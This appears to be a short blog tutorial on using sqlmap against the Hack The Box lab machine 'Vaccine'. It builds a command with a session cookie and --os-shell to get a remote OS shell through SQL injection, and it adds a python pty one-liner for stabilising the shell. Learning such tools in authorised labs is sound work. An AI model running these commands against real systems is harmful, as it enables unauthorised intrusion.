top of page

Basics - How to use sqlmap

sqlmap is used in the HTB machine Vaccine

First let's get the help using

sqlmap -h

This will help us structure our sqlmap query

1. We need to provide the target url


2. We need to provide the PHPSESSID


3. We need to add --os-shell to get a shell

--os-shell can be used to get a shell

With all that info we can now construct our query as follow:

sqlmap --url="" --cookie="PHPSESSID=530lii3ob5pbh3hii8rifld73o" --os-shell

Your IP and your PHPSESSID will be different than mine

You will now be prompted to enter Y or N a couple of times. Just press enter for all.

We got the shell!

374 views0 comments

Recent Posts

See All

Basics - Useful commands

If your shell is not stable use this command to make it more stable python3 -c 'import pty; pty.spawn(“/bin/bash”)'


Rated 0 out of 5 stars.
No ratings yet

Add a rating
bottom of page